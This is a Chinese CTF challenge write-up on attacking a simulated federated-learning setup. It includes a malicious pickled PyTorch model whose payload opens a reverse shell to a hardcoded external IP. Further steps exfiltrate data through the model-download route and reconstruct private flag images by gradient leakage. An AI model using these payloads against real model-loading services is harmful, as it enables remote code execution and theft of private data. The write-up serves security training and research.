题目设计 本题通过在docker中隔离两个账户权限,模拟联邦学习框架。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 FROM python:3.10 -slimRUN apt-get update && apt-get install -y supervisor wget && rm -rf /var/lib/apt/lists/* RUN pip install -i https://mirrors.aliyun.com/pypi/simple/ \ flask \ requests \ pillow \ numpy RUN pip install -i https://pypi.mirrors.ustc.edu.cn/simple/ torch==2.3.0+cpu torchvision==0.18.0+cpu -f https://download.pytorch.org/whl/torch_stable.html RUN useradd -m -s /bin/bash victimuser RUN useradd -m -s /bin/bash serveruser COPY ./victim /app/victim COPY ./server /app/server RUN chown -R victimuser:victimuser /app/victim RUN chmod 750 /app/victim RUN chown -R serveruser:serveruser /app/server RUN chmod 755 /app/server COPY supervisord.conf /etc/supervisor/conf.d/supervisord.conf CMD ["/usr/bin/supervisord" , "-c" , "/etc/supervisor/conf.d/supervisord.conf" ]
通过中心服务节点的供应链打击,通过梯度泄露的方式,最终窃取其他用户隐私数据,摧毁整个联邦框架。
WriteUp 审计代码,题目的整体流程是:
1. 三方参与的联邦学习模型,玩家、Victim、Server
2. 每一轮中,玩家先获取一个模型和脚本到本地,训练之后上传模型;server接着传输给victim,victim训练结束后返回一个模型。
为了获得victim的flag数据,我们首先要控制Server端。审计代码注意到torch.load有weight_only = false,于是制作带有恶意代码的pth进行利用。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 import runpyimport torchfrom model import LeNetimport requestsclass Demo (object ): def __reduce__ (self ): return runpy._run_code, ("""import os,pty,socket;s=socket.socket();s.connect(("39.105.218.132",8080));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")""" , {}) model = LeNet(num_classes=100 ) model_dict = model.state_dict() model_dict['evil' ] = Demo() torch.save(model_dict, 'evil.pth' ) res = requests.get('http://localhost:8080/get_model' ) with open ('model.pth' , 'wb' ) as f: f.write(res.content) res = requests.post('http://localhost:8080/upload_model' , files={'model' : open ('evil.pth' , 'rb' )}, data={'model_name' : 'client' }) print (res.json())res = requests.get('http://localhost:8080/federated_round' ) print (res.json())
注意到victim的训练过程关键如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 download_model() load_model() optimizer = optim.SGD(model.parameters(), lr=0.1 ) ...... img = Image.open (f'/app/victim/flag/{round } .png' ).convert('RGB' ) img_tensor = transform(img).unsqueeze(0 ) ...... send_model()
因此在掌握了服务端模型的情况下,可以根据如下公式推出梯度
$$ Weight_{init} - Weight_{Trained} = \frac{\mathrm{d} y}{\mathrm{d} x} \times SGD_{Lr} $$
此时的模型初始化 十分重要,因为当梯度分布不均匀时,逆向LBFGS优化的代价越大,可能出现梯度爆炸。
接着,通过伪造服务端消息向victim发送数据,保存临时模型文件。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 import torchimport torch.nn as nnimport requestsimport osclass LeNet (nn.Module): def __init__ (self, num_classes=10 ): super (LeNet, self ).__init__() self .body = nn.Sequential( nn.Conv2d(3 , 12 , kernel_size=5 , padding=5 //2 , stride=2 ), nn.Sigmoid(), nn.Conv2d(12 , 12 , kernel_size=5 , padding=5 //2 , stride=2 ), nn.Sigmoid(), nn.Conv2d(12 , 12 , kernel_size=5 , padding=5 //2 , stride=1 ), nn.Sigmoid(), ) self .fc = nn.Sequential( nn.Linear(768 , num_classes) ) def forward (self, x ): out = self .body(x) out = out.view(out.size(0 ), -1 ) out = self .fc(out) return out def weights_init (m ): if hasattr (m, "weight" ): m.weight.data.uniform_(-0.5 , 0.5 ) if hasattr (m, "bias" ): m.bias.data.uniform_(-0.5 , 0.5 ) torch.manual_seed(12345 ) model = LeNet(num_classes=100 ) model.apply(weights_init) torch.save(model.state_dict(), '/app/server/global_model.pth' ) for i in range (39 ): res = requests.get(f'http://localhost:5000/action?round={i} ' ) print (res.status_code) os.mkdir('/app/server/data' ) os.system(f'cp /tmp/victim.pth /app/server/data/victim_{i} .pth' )
因为只有单端口开发,思考文件如何外发,通过覆盖全局模型,走get_model路由外发
1 2 3 tar czvf data.tar data rm global_model.pthmv data.tar global_model.pth
获取模型数据后,通过DLG梯度泄露来还原flag数据。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 import torchfrom PIL import Imageimport timeimport osimport numpy as npimport torchvision.transforms as transformsimport torch.nn as nnimport torch.nn.functional as Fimport pickleimport matplotlib.pyplot as pltfrom model import LeNet, cross_entropy_for_onehot, label_to_onehotdef weights_init (m ): if hasattr (m, "weight" ): m.weight.data.uniform_(-0.5 , 0.5 ) if hasattr (m, "bias" ): m.bias.data.uniform_(-0.5 , 0.5 ) tt = transforms.ToTensor() tp = transforms.ToPILImage() for i in range (39 ): torch.manual_seed(12345 ) model = LeNet(num_classes=100 ) model.apply(weights_init) victim_model = LeNet(num_classes=100 ) victim_model.load_state_dict(torch.load(f'data/victim_{i} .pth' , weights_only=True , map_location='cpu' )) old_weights = [p.clone().detach() for p in model.parameters()] new_weights = [p.clone().detach() for p in victim_model.parameters()] original_dy_dx = [] for old_p, new_p in zip (old_weights, new_weights): recon_g = (old_p - new_p) / 0.1 original_dy_dx.append(recon_g) dummy_data = torch.randn(1 ,3 ,32 ,32 ).requires_grad_(True ) dummy_label = torch.randn(1 ,100 ).requires_grad_(True ) criterion = cross_entropy_for_onehot optimizer = torch.optim.LBFGS([dummy_data, dummy_label]) history = [] for iters in range (151 ): def closure (): optimizer.zero_grad() dummy_pred = model(dummy_data) dummy_onehot_label = F.softmax(dummy_label, dim=-1 ) dummy_loss = criterion(dummy_pred, dummy_onehot_label) dummy_dy_dx = torch.autograd.grad(dummy_loss, model.parameters(), create_graph=True ) grad_diff = 0 for gx, gy in zip (dummy_dy_dx, original_dy_dx): grad_diff += ((gx - gy) ** 2 ).sum () grad_diff.backward() return grad_diff optimizer.step(closure) if iters % 10 == 0 : current_loss = closure() print (iters, "%.4f" % current_loss.item()) history.append(tp(dummy_data[0 ])) history[-1 ].save(f'results//{i} .png' )
最终结果如下图
Something Interest
出题结束时候恰逢BlackHat会议,存在其他供应链问题。
模型参数的初始化问题难以调整,想要一次交互获得能够进行优化的梯度的种子太少了,我尝试了42、12345,2345,1234,114514,4444,1111,2222等数二十种,最终选取了这个种子。
致歉:短横线 - 和下划线 _ 没有说明白,错了QaQ。